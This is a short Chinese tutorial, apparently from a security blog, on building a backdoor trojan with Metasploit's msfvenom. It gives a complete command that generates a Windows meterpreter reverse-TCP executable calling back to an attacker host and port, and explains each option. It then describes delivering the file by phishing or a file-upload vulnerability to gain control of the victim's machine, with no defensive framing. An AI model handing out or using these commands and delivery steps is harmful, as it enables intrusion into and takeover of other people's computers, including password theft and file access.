本文最后更新于 184 天前,其中的信息可能已经有所发展或是发生改变。
一般由metasploit、cobaltstrike等c2文件控制器生成的系统可执行文件(exe apk elf macho) 本篇文章以Metasploit为例。
0x01
windows可执行程序后门木马生成 (msfvenom是metasploit提供的一个生成后门木马的程序):
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.234.137 lport=9999 -f exe -o test.exe
-p
就是攻击载荷,分为两个部分,如下。
windows/x64/meterpreter/reserve_tcp为第一个部分,这里写要攻击的操作系统与通过什么样的方式去攻击。例子中以meterpreter作为攻击载荷,操作系统是 windows/x64,/reserve_tcp就是将受害者机器以反连tcp的方式连接到我们的黑客服务器,给我们提供目标机器meterpreter shell的链接。整个过程即反弹shell的建立。meterpreter shell的功能很强大,包括但不限于添加一个用户、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe等
第二个部分为payload的设置,即黑客服务器的ip地址与端口
-f
即format,要生成的文件格式
-o
生成文件的文件名
生成之后,通过钓鱼或文件上传漏洞发送到目标机器,在黑客服务器上开启对应的端口监听,之后让木马运行,即可得到目标机器的控制权。